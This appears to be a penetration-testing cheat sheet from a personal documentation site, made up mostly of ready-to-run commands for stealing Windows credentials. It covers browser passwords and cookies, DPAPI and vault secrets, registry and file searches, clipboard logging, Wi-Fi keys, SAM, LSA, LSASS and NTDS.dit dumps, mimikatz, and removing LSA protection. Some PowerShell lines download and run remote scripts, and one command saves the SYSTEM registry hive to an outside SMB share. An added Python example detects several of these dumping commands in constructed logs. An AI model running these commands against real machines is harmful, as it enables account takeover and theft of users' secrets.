> For the complete documentation index, see [llms.txt](https://intrusionz3r0.gitbook.io/intrusionz3r0/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://intrusionz3r0.gitbook.io/intrusionz3r0/windows-penetration-testing/credentials-attacks-on-windows.md).

# Credentials Attacks On Windows

## Web Credentials

```powershell
PS C:\> start lazagne.exe all
PS C:\> .\SharpChrome.exe logins /unprotect

PS C:\> vaultcmd /list
PS C:\> vaultcmd /listcreds:"Web Credentials" /all

#-----------Edge---------------------------------
#Extract credentials from the Edge browser
PS C:\> (Get-Content "C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" /encryptedkey:<SNIF>e4x8+n0VDX82CffsyVmOzvSraXQ== /unprotect

#-----------Firefox-------------------------------
#Extract passwords from Mozilla Firefox profiles
Intrusionz3r0@htb[/htb]$ python firefox_decrypt.py /folder/containing/profiles.ini/

#Cookies
#Path: %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d

#---------Chromium--------------------------------
PS C:\> (Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect

#Cookies
#Path: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\> copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
PS C:\> Invoke-SharpChromium -Command "cookies slack.com"
```

## Credentials manager

```powershell
#List saved credentials
PS C:\> cmdkey /list

#Enumerate Windows credentials in the vault
PS C:\> vaultcmd /listcreds:"Windows Credentials" /all

PS C:\Temp> .\SharpDPAPI.exe machinecredentials

#Locate the user's DPAPI master key file (one GUID-named file per master key)
#Path: C:\Users\<user>\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx\556a2412-xxxx-4ccf-b721-e6a0b4f90407

#1. Decrypt the master key with the user's password
mimikatz "dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx\556a2412-xxxx-4ccf-b721-e6a0b4f90407 /password:MYPASSWORD123 /protected" exit

#2. Decrypt the credential blob with the recovered master key
mimikatz "dpapi::cred /in:C:\Users\user\AppData\Roaming\Microsoft\Credentials\C8XXXXXXXXXXXXXXXXXXXXXXXX1B9 /masterkey:d9a<SNIF>f319e9c84" exit
```

## DPAPI

```sh
#Using DonPAPI (best option)
donpapi collect -u 'John.ford' -H 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' --collectors All --target vdixx.eu-xxxx.vl -d eu-xxxx.vl --dc-ip xx.xx.xx.xx

#Using netexec
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi cookies
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi nosystem
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --local-auth --dpapi nosystem
```

## Search Credentials

### Extract credentials using SessionGopher

```powershell
PS C:\htb> Import-Module .\SessionGopher.ps1
PS C:\htb> Invoke-SessionGopher -Target WINLPE-SRV01
```

### Sniff passwords and hashes with net-creds

```sh
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py -i eth0
```

### Search credentials on the registry

```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # Windows autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # PuTTY clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3" /v Password # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### Search for file contents

```powershell
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
dir | select-string "password"
PS C:\htb> Get-ChildItem -Path C:\PSTranscripts -Force -Recurse -Include *.txt, *.cfg, *.conf, *.xml, *.ini -Exclude "Windows","Documents*", "Program F*" -ErrorAction SilentlyContinue
PS C:\htb> Get-ChildItem -Path "C:\Users" -Recurse -File | Select-String -Pattern "password" | Select-Object FileName, LineNumber, Line
```

### Search for filename

```powershell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
C:\htb> dir \confidentials.txt /s /p
PS C:\htb> Get-ChildItem -Path C:\ -Filter "confidentials.txt" -Recurse
```

### Passwords in unattend.xml

```sh
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

### Retrieve Putty Credentials from registry

```powershell
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<value>
```

## PowerShell

### Powershell History File

```powershell
C:\> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\> cat (Get-PSReadlineOption).HistorySavePath
```

### Powershell Transcript

```powershell
PS C:\> gc C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
PS C:\> gc C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
```

### Recover credentials on PowerShell scripts

**First Option:**

```powershell
PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\htb> $credential.GetNetworkCredential().username
PS C:\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss!
```

**Second Option**

```powershell
PS C:\> $user = "Administrator"
PS C:\> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
PS C:\> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
PS C:\> $cred.GetNetworkCredential() | Format-List
```

## Alternate Data Stream

### Retrieve Credentials on data streams

```powershell
PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag
```

## Clipboard

### Monitor Clipboard

```powershell
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
PS C:\htb> Invoke-ClipboardLogger
```

## Sensitive Files

### IIS Web config

```powershell
PS C:\> Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```

### Retrieve password from Wireless

```powershell
C:\htb> netsh wlan show profile
C:\htb> netsh wlan show profile <ssid-name> key=clear

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
```

## Sticky notes

```powershell
#Path: C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Intrusionz3r0@htb[/htb]$ sqlite3 plum.sqlite "select Text from Note;"
Intrusionz3r0@htb[/htb]$ strings plum.sqlite-wal

PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process
PS C:\htb> cd .\PSSQLite\
PS C:\htb> Import-Module .\PSSQLite.psd1
PS C:\htb> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
```

### Copying SAM, SYSTEM and SECURITY

```bash
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
```

### Dumping SAM and SYSTEM

```bash
Intrusionz3r0X@htb[/htb]$ impacket-reg domain/domuser:'Password'@192.168.210.16 save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.3\smbfolder'
Intrusionz3r0X@htb[/htb]$ impacket-secretsdump -sam sam.save -system system.save LOCAL
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --sam
```

### Dump LSA

```bash
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --lsa
```

### Dump lsass

```bash
#Find the LSASS PID from cmd
C:\Windows\system32> tasklist /svc

#Find the LSASS PID from PowerShell
PS C:\Windows\system32> Get-Process lsass
#----------------------------------------

#Create the lsass dump file (672 is the PID found above)
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

#Parse the lsass.dmp file offline
Intrusionz3r0X@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp

#Or read the credentials directly from the live LSASS with mimikatz
C:\Windows\system32> .\mimikatz.exe privilege::debug "sekurlsa::logonpasswords full" exit
```

#### Dump lsass using RDP session

[Figure: screenshot, no caption in the original]

### Dump NTDS.dit

To make a copy of the NTDS.dit file, we need local admin (`Administrators` group) or Domain Admin (`Domain Admins` group) rights, or equivalent.

```bash
#List the local groups
C:\> net localgroup

#Check the user's group membership
C:\> net user bwilliamson

#Create a shadow copy of the C: volume (NTDS.dit is locked while AD is running)
C:\> vssadmin CREATE SHADOW /For=C:

#Copy NTDS.dit out of the shadow copy
C:\> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

#Extract credentials from NTDS.dit with DSInternals
PS C:\htb> Import-Module .\DSInternals.psd1
PS C:\htb> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

#Extract hashes with secretsdump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

#Fastest way to dump the NTDS remotely
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds
```
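From the defender's side, every collection step above (the `reg save` of the SAM/SYSTEM/SECURITY hives, the `comsvcs.dll MiniDump` of LSASS, and the shadow copy followed by a copy of NTDS.dit) leaves a process command line in the logs. The following is an added example, not part of the original page: it runs simple detection rules over constructed process-creation events in a hypothetical tab-separated format, and treats a shadow copy as suspicious only when NTDS.dit is afterwards copied out of it.

```python
import re
from collections import namedtuple
# Detection rules for the hive, LSASS and NTDS.dit collection commands listed on this
# page, matched case-insensitively against a process-creation command line.
RULES = {
    "lsass_minidump_comsvcs": re.compile(r"comsvcs\.dll\s*,\s*MiniDump\b", re.I),
    "hive_export_reg_save": re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I),
    "shadow_copy_create": re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I),
    "ntds_copy_from_shadow": re.compile(r"GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+\\.*ntds\.dit", re.I),
}

# Constructed sample events (timestamp<TAB>host<TAB>user<TAB>command line), not real logs.
SAMPLE_LOG = """\
2024-05-01T10:02:11Z\tWINLPE-SRV01\tCORP\\jdoe\trundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full
2024-05-01T10:03:40Z\tWINLPE-SRV01\tCORP\\jdoe\treg.exe save hklm\\sam C:\\sam.save
2024-05-01T10:03:41Z\tWINLPE-SRV01\tCORP\\jdoe\treg.exe save hklm\\system C:\\system.save
2024-05-01T10:05:02Z\tDC01\tCORP\\bwilliamson\tvssadmin CREATE SHADOW /For=C:
2024-05-01T10:05:30Z\tDC01\tCORP\\bwilliamson\tcmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit
2024-05-01T10:06:00Z\tWS07\tCORP\\alice\tnotepad.exe C:\\Users\\alice\\notes.txt
2024-05-01T10:07:00Z\tWS07\tCORP\\alice\treg.exe query HKCU\\Software\\SimonTatham\\PuTTY\\Sessions
"""

Event = namedtuple("Event", "timestamp host user command_line")
def parse_line(line: str) -> Event:
    # The constructed format is tab-separated; the command line is the last field.
    return Event(*line.split("\t", 3))

def classify(command_line: str) -> list:
    # Names of every rule that matches the command line (empty list if nothing matched).
    return [name for name, rx in RULES.items() if rx.search(command_line)]

def scan(log_text: str) -> list:
    # (event, matched rule names) for each suspicious line, in log order.
    hits = []
    for raw in filter(str.strip, log_text.splitlines()):
        ev = parse_line(raw)
        if names := classify(ev.command_line):
            hits.append((ev, names))
    return hits

def ntds_theft_hosts(hits: list) -> set:
    # A shadow copy alone is routine (backups); flag hosts where NTDS.dit is then copied out of one.
    shadow_hosts, flagged = set(), set()
    for ev, names in hits:
        if "shadow_copy_create" in names:
            shadow_hosts.add(ev.host)
        if "ntds_copy_from_shadow" in names and ev.host in shadow_hosts:
            flagged.add(ev.host)
    return flagged
```

On the sample, `scan` flags five of the seven events and `ntds_theft_hosts` returns only `DC01`; a real deployment would feed Security event 4688 or Sysmon event 1 command lines into `classify` instead.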

## Mimikatz

```sh
# Dump the local SAM database
mimikatz lsadump::sam

# Dump LSA
mimikatz lsadump::lsa /inject

# Dump LSA secrets
mimikatz lsadump::secrets

# Dump the logon passwords
mimikatz sekurlsa::logonpasswords

# Dump the encryption keys used by Kerberos
mimikatz sekurlsa::ekeys

# Dump Domain Cached Credentials
mimikatz lsadump::cache

# Dump trust secrets
mimikatz lsadump::trust /patch
```

#### Bypassing LSA protection

**Error:** `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)`

```sh
!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords
```

[Figure: screenshot, no caption in the original]
